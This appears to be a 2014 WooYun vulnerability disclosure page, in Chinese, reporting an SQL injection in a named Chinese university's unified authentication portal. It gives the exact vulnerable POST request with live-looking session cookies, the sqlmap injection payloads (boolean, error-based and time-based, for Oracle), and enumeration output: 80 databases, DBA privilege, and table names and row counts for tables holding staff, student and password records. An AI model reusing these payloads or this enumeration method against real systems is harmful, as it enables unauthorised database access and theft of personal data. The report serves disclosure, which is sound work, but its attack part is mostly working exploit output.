当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082354

漏洞标题:某大学统一身份认证平台SQL注入,泄露师生信息

相关厂商:CCERT教育网应急响应组

漏洞作者: 路人甲

提交时间:2014-11-07 16:28

修复时间:2014-11-12 16:30

公开时间:2014-11-12 16:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-07: 细节已通知厂商并且等待厂商处理中
2014-11-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

80个数据库,其中一个340个表,上百万数据,DBA权限,可拖库,然后走小厂商,恩,没错!

详细说明:

中国人民大学统一认证页面

https://cas.ruc.edu.cn/cas/login


登入处存在SQL注入
POST请求

POST /account/confirm.do?method=checkfs HTTP/1.1
Host: portal.ruc.edu.cn
Proxy-Connection: keep-alive
Content-Length: 32
Accept: */*
Origin: http://portal.ruc.edu.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://portal.ruc.edu.cn/account/confirm/reset1.jsp
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: neusoftrucportal=5mLFJVlbmZngfJh7TNbZ2yhm2XhstjG4WvywhLgWRT6MjcGyr6s2!608312459; BIGipServerruc_portal=3909593280.42271.0000; JSESSIONID=81FVJVkpTgZL17XvgDhy2c9Dp1hP4Yy5kQHmTJTKFSnQh64xxbWn!-1716597195; BIGipServeraccount=1762109632.2336.0000
RA-Ver: 2.7.0
RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bcc
account=admin&fs=1&mobile=1111&mail=


漏洞证明:

证明,80个数据库,其中一个340个表,DBA权限,其他不列了,反正很多

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: account
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: account=admin' AND 2590=2590 AND 'SkMM'='SkMM&fs=1&mobile=1111&mail=
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: account=admin' AND 4993=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(109)||CHR(121)||CHR(99)||CHR(113)||(SELECT (CASE WHEN (4993=4993) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(122)||CHR(100)||CHR(113)) AND 'XsTJ'='XsTJ&fs=1&mobile=1111&mail=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: account=admin' AND 3183=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'oXbv'='oXbv&fs=1&mobile=1111&mail=
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
current user is DBA: True
available databases [80]:
[*] ADOBE
[*] APEX_030200
[*] APPQOSSYS
[*] BND_HQ
[*] BNDTS
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DCP
[*] DCP_APPS
[*] DCP_CMS
[*] DCP_EDP
[*] DCP_EPSA
[*] DCP_PORTAL
[*] DCP_SNS
[*] DW_DEMO
[*] E_EVALUATE
[*] EDPSIS
[*] EDUIDC
[*] EPSA
[*] EPSA2
[*] EXFSYS
[*] FLOWS_FILES
[*] FRAME
[*] ICDC_EDU_REPORT
[*] ICDC_ODS
[*] ICDC_REPORT
[*] ICDC_RUC
[*] ICDC_UTIL
[*] IDC_I_COMM
[*] IDC_MAIL
[*] IDC_U2_DQ
[*] IDC_U2_GJJL
[*] IDC_U2_PUB
[*] IDC_U_BKJW
[*] IDC_U_COMM
[*] IDC_U_CW
[*] IDC_U_CW_1
[*] IDC_U_CW_2
[*] IDC_U_DXP
[*] IDC_U_HJ
[*] IDC_U_ISS
[*] IDC_U_KY
[*] IDC_U_KY2
[*] IDC_U_OA
[*] IDC_U_PUB
[*] IDC_U_REPORT
[*] IDC_U_RS
[*] IDC_U_RYZP
[*] IDC_U_SOFT
[*] IDC_U_STAT
[*] IDC_U_XM
[*] IDC_U_XS
[*] IDC_U_YJSJW
[*] IDC_YJS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PERFSTAT
[*] PUBINFO
[*] RD_GRFW
[*] RUC_SWAPPER
[*] RUCOA
[*] RUCOA_GW
[*] SCOTT
[*] SIS
[*] SSO
[*] SSO_USER
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBLOGIC
[*] WMSYS
[*] XDB
[*] ZCT_MANAGER
[*] ZFT_MANAGER
Database: IDC_U_PUB
[340 tables]
+--------------------------------+
| A02BK |
| A03BK |
| A03BS |
| A03SS |
| A03SSCJ |
| A04BK |
| A04BS |
| A04EX |
| A04SS |
| A04SSCJ |
| A05BK |
| A05BS |
| A05EX |
| A05SS |
| A05SSCJ |
| AA10 |
| AAAAA |
| AD_BUCKET |
| AD_COUNT |
| APPOINTMENTACLOWNERTABLE |
| APPOINTMENTACLTABLE |
| APPOINTMENTTABLE |
| ATTACHMENT |
| BKJW_DM_DSZ |
| BKJW_DM_JSJY_CLBZ |
| BKJW_DM_JSJY_HTBZ |
| BKJW_DM_JSJY_JYLX |
| BKJW_DM_JWCLBZ |
| BKJW_DM_PK_JSFPLB |
| BKJW_DM_PK_JSFPXBBZ |
| BKJW_DM_PK_PKBZ |
| BKJW_DM_PK_ZT |
| BKJW_DM_SXFS |
| BKJW_DM_WYSLJ_HSJG |
| BKJW_DM_WYSLJ_JFBZ |
| BKJW_DM_WYSLJ_KSDJ |
| BKJW_DM_YDCJZT |
| BKJW_PK_JSFP_TEMP |
| BKJW_XK_XHKCHPC |
| BKJW_XK_XHKCHPC_SFQY |
| BT_EVENT |
| BT_EVENT_ACTION |
| BT_EVENT_TYPE |
| BUSICATEGORY |
| CATALOG_ENTITY |
| CATALOG_PROPERTY_KEY |
| CATALOG_PROPERTY_VALUE |
| CHNDD |
| CHNDDDETAIL |
| CLU_1JMSSTATE |
| CLU_1JMSSTORE |
| CLU_2JMSSTATE |
| CLU_2JMSSTORE |
| CMV_NODE |
| CMV_NODE_ASSIGNED_ROLE |
| CMV_NODE_VERSION |
| CMV_NODE_VERSION_PROPERTY |
| CMV_PROPERTY |
| CMV_VALUE |
| CM_NODE |
| CM_OBJECT_CLASS |
| CM_PROPERTY |
| CM_PROPERTY_CHOICE |
| CM_PROPERTY_DEFINITION |
| CONTACTACLOWNERTABLE |
| CONTACTACLTABLE |
| CONTACTTABLE |
| CTEST |
| DATA_SYNC_APPLICATION |
| DATA_SYNC_ITEM |
| DATA_SYNC_SCHEMA_URI |
| DATA_SYNC_VERSION |
| DICT_DATA_NOT_DISP |
| DICT_TABLE_INFO |
| DICT_YESNO |
| DISCOUNT |
| DISCOUNT_ASSOCIATION |
| DISCUSSIONUSERTABLE |
| DISTCNTTABLE |
| DISTLISTACLOWNERTABLE |
| DISTLISTACLTABLE |
| DISTLISTTABLE |
| DM_BZKZY |
| DM_BZRLB |
| DM_SXLX |
| DM_ZCLX |
| DM_ZYX |
| DRM_SYS_CODEINTEGRATION |
| DRM_SYS_CONNECTIONPOOL |
| DRM_SYS_DATASOURCE |
| DRM_SYS_ENVIRONMENTVARIABLE |
| DRM_SYS_FIELDCONVERTMAPPING |
| DRM_SYS_FIELDSASSOCIATION |
| DRM_SYS_FIELD_SCHEMA_EXTENDS |
| DRM_SYS_MLTMEANINGFIELDS |
| DRM_SYS_MLTMEANINGFIELDSDETAIL |
| DRM_SYS_PUBLICCODEMAINTENANCE |
| DRM_SYS_TABLECONVERTMAPPING |
| DRM_SYS_TABLE_SCHEMA_EXTENDS |
| E$_SER_BKXX |
| ENTITY |
| FILE_PENDING |
| FLYCATEGORY |
| FLYOBJECT |
| FLYPARSER |
| FORUMACLOWNERTABLE |
| FORUMACLTABLE |
| FORUMTABLE |
| FORUM_MESSAGES |
| GNBG_DM_BGZT |
| GNBG_DM_JJCD |
| GNBG_DM_SUBSYSTEM |
| GNBG_XXXX |
| GNBG_XXXX_IMPORT |
| GRADUATETEMP |
| GROUP_HIERARCHY |
| GROUP_SECURITY |
| IDC_SYNC |
| IDC_U_BSHJBXX |
| IDC_U_GZZB |
| IDC_U_JZGJBXX |
| IDC_U_LSRYJBXX |
| IDC_U_LXSXX |
| IDC_U_RS_YXSBZXXX |
| IDC_U_RS_YXSBZXXX_BAK |
| IDC_U_RYJBXX |
| IDC_U_RYJBXX_20080826 |
| IDC_U_RYJBXX_20080826_1 |
| IDC_U_RYJBXX_LOG |
| IDC_U_RYJBXX_TO_XSC |
| IDC_U_XSJBXX |
| IDC_U_XSZSXX |
| IDC_U_XSZSXX_LOG |
| INFO |
| INFO_AND_ATTACHMENT |
| INFO_BOARD |
| INFO_BOARD_ADMIN |
| INFO_BOARD_AND_INFO |
| INFO_BOARD_AND_USER |
| INFO_BOARD_TYPE |
| INFO_BROWSE |
| JBXX |
| JMSSTATE |
| JMSSTORE |
| KY_DM_CDXMXZ |
| KY_DM_JGLB |
| KY_DM_PZJG |
| KY_DM_XKMLKJ |
| KY_KJXMJBQK |
| L10N_INTERSECTION |
| L10N_LOCALE |
| L10N_RESOURCE |
| L10N_RESOURCE_TYPE |
| LS_PERMISSION |
| LS_RESOURCE |
| MAIL_ADDRESS |
| MAIL_BATCH |
| MAIL_BATCH_ENTRY |
| MAIL_HEADER |
| MAIL_MESSAGE |
| MESSAGEFILETABLE |
| MESSAGETABLE |
| ORDER_ADJUSTMENT |
| ORDER_LINE_ADJUSTMENT |
| P13N_ANONYMOUS_PROPERTY |
| P13N_ANONYMOUS_USER |
| P13N_DELEGATED_HIERARCHY |
| P13N_ENTITLEMENT_APPLICATION |
| P13N_ENTITLEMENT_POLICY |
| P13N_ENTITLEMENT_RESOURCE |
| P13N_ENTITLEMENT_ROLE |
| PAR_REPORT |
| PASSWORD |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PF_BOOK_DEFINITION |
| PF_BOOK_GROUP |
| PF_BOOK_INSTANCE |
| PF_CONSUMER_PORTLETS |
| PF_CONSUMER_PROPERTIES |
| PF_CONSUMER_REGISTRY |
| PF_DESKTOP_DEFINITION |
| PF_DESKTOP_INSTANCE |
| PF_LAYOUT_DEFINITION |
| PF_LOOK_AND_FEEL_DEFINITION |
| PF_MARKUP_DEFINITION |
| PF_MENU_DEFINITION |
| PF_PAGE_DEFINITION |
| PF_PAGE_INSTANCE |
| PF_PLACEHOLDER_DEFINITION |
| PF_PLACEMENT |
| PF_PORTAL |
| PF_PORTLET_CATEGORY |
| PF_PORTLET_CATEGORY_DEFINITION |
| PF_PORTLET_DEFINITION |
| PF_PORTLET_INSTANCE |
| PF_PORTLET_PREFERENCE |
| PF_PORTLET_PREFERENCE_VALUE |
| PF_PRODUCER_PROPERTIES |
| PF_PRODUCER_REGISTRY |
| PF_PROXY_PORTLET_INSTANCE |
| PF_SHELL_DEFINITION |
| PF_THEME_DEFINITION |
| PLACEHOLDER_PREVIEW |
| PLAN_TABLE |
| PLSQL_PROFILER_DATA |
| PLSQL_PROFILER_RUNS |
| PLSQL_PROFILER_UNITS |
| POP3ATTACHMENTS |
| POP3FOLDERS |
| POP3MESSAGEHEADERS |
| POP3MESSAGES |
| POP3PREFERENCES |
| POR_1JMSSTATE |
| POR_1JMSSTORE |
| POR_2JMSSTATE |
| POR_2JMSSTORE |
| PRODUCT_ACHIEVE |
| PROPERTY_KEY |
| PROPERTY_VALUE |
| PUB_BBXX |
| PUB_DM_RYZTDYB |
| PUB_SFZHJC |
| QUERYFIELDS |
| QUERYFILTER |
| QUERYOBJECT |
| QUERYRELATION |
| ROLEACLS |
| ROLES |
| RP_BB |
| RP_BBMB |
| RP_BBNR |
| RP_GSDY |
| RP_ZB |
| RP_ZBMB |
| RS_GWPY_SBJBDM |
| RS_GWPY_SBLBDM |
| RS_GWPY_SBLXDM |
| RS_LSRYSFDM |
| RYJBXX_TEST |
| SCENARIO_END_STATE |
| SEQUENCER |
| SEQUENCETABLE |
| SEQUENCETABLE_YEARNUM |
| SEQUENCE_GENERATOR |
| SERIALMGT |
| SER_BKXX |
| SER_DM_BKXXFLAG |
| SMART_PERSONNEL |
| SYS_ASSIGNER_AND_USER |
| SYS_DEPT |
| SYS_GROUP |
| SYS_GROUP_USER |
| SYS_MODULE |
| SYS_MODULE_AND_TIME |
| SYS_MODULE_TIME_LOG |
| SYS_PERMISSION |
| SYS_PERMISSION_BAK |
| SYS_PERMISSION_BAK060630 |
| SYS_PERM_AND_ORG |
| SYS_PERM_AND_ROLE |
| SYS_PERM_AND_ROLE_AND_ORG |
| SYS_PERM_AND_URL |
| SYS_PERM_AND_USER |
| SYS_PERM_DATA_SCOPE |
| SYS_PERM_LOG |
| SYS_RESOURCE |
| SYS_RESOURCE_BAK |
| SYS_RESOURCE_BAK060630 |
| SYS_ROLE |
| SYS_ROLE_DATA |
| SYS_ROLE_DATA_SCOPE |
| SYS_ROLE_MODULE |
| SYS_ROLE_ORG |
| SYS_ROLE_ORG_USER |
| SYS_ROLE_USER |
| SYS_ROLE_USER_BAK061222 |
| SYS_URL |
| SYS_USER |
| SYS_USER_DATA |
| SYS_USER_DATA_SCOPE |
| SYS_USER_DEPT |
| SYS_USER_GROUP |
| SYS_USER_MODULE |
| SYS_USER_ROLE |
| SYS_USER_ROLE_ORG |
| TASKJOB |
| TEMPSTUDENT |
| TEST |
| TEST_ACCESS |
| TIANLC_TABLE |
| TODOACLOWNERTABLE |
| TODOACLTABLE |
| TODOTABLE |
| TOPICFILETABLE |
| TOPICSUBTABLE |
| TOPICTABLE |
| TZFKQK |
| TZLLQK |
| UNIQUEIDGENERATOREJBTABLE |
| USERACLS |
| USERROLES |
| USERS |
| USER_GROUP_CACHE |
| USER_GROUP_HIERARCHY |
| USER_PROFILE |
| USER_SECURITY |
| USER_SECURITYBAK |
| USER_SECURITY_TEMP |
| WEBLOGICJMSSTATE |
| WEBLOGICJMSSTORE |
| WEBLOGIC_IS_ALIVE |
| WLCS_CATEGORY |
| WLCS_CREDIT_CARD |
| WLCS_CUSTOMER |
| WLCS_ORDER |
| WLCS_ORDER_LINE |
| WLCS_PRODUCT |
| WLCS_PRODUCT_CATEGORY |
| WLCS_PRODUCT_KEYWORD |
| WLCS_SAVED_ITEM_LIST |
| WLCS_SECURITY |
| WLCS_SHIPPING_ADDRESS |
| WLCS_SHIPPING_METHOD |
| WLCS_TRANSACTION |
| WLCS_TRANSACTION_ENTRY |
| YJS_ZCJF_0507 |
| YJS_ZCJF_05_07 |
| ZHANGR |
| ZHANGRT |
| ZHAOQUAN |
| ZH_YJ1 |
| ZH_YJ4 |
| ZH_YJ5 |
| ZH_YJ6 |
| ZH_YJ7 |
| ZH_YJ8 |
+--------------------------------+
Database: IDC_U_PUB
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| IDC_U_RYJBXX_LOG | 268128 |
| SYS_ROLE_USER | 215255 |
| SMART_PERSONNEL | 89580 |
| SYS_ROLE_USER_BAK061222 | 88595 |
| IDC_U_XSZSXX_LOG | 86414 |
| IDC_U_RYJBXX_20080826 | 84338 |
| IDC_U_RYJBXX_20080826_1 | 84338 |
| SYS_USER | 69390 |
| ZH_YJ4 | 52187 |
| ZH_YJ5 | 52187 |
| ZH_YJ7 | 52142 |
| ZH_YJ1 | 50313 |
| USER_SECURITY | 46645 |
| USER_GROUP_HIERARCHY | 42457 |
| IDC_U_XSJBXX | 38867 |
| PUB_SFZHJC | 30268 |
| ENTITY | 28603 |
| PF_PLACEMENT | 28002 |
| PASSWORD | 27830 |
| USER_SECURITYBAK | 27702 |
| ZHAOQUAN | 27302 |
| ZH_YJ6 | 26499 |
| ZH_YJ8 | 26499 |
| SYS_PERM_AND_ROLE | 23573 |
| SYS_PERMISSION | 11341 |
| TEST_ACCESS | 10551 |
| PF_PORTLET_INSTANCE | 8615 |
| GRADUATETEMP | 8034 |
| PF_BOOK_GROUP | 7534 |
| PF_DESKTOP_INSTANCE | 6958 |
| SYS_RESOURCE | 6172 |
| RP_BBNR | 5931 |
| POP3MESSAGEHEADERS | 5180 |
| YJS_ZCJF_0507 | 5152 |
...省略
+--------------------------------+---------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-12 16:30

厂商回复:

最新状态:

暂无


漏洞评价:

评论